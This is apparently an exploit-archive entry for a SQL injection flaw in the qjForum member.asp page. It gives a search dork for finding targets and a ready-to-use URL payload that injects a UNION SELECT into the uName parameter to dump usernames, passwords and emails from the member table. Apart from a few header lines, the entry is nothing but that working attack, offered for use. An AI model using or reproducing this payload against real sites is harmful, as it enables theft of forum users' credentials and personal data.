id: 450
date: 05/25/2006
title: qjForum (member.asp) SQL Injection Vulnerability
author: ajann
cves: 

================================================
qjForum (member.asp) SQL Injection Vulnerability
================================================



# Title  :   qjForum(member.asp) SQL Injection Vulnerability
# Author :   ajann
# greetz :   Nukedx,TheHacker
# Dork   :   "qjForum"
# Exploit:

# Login before injection.

### http://target/[path]/member.asp?uName='union%20select%200,0,0,username,0,0,pd,email,0,0,0,0,0,0,0,0,0,0,0,0%20from%20member



#  0day.today [2023-03-26]  #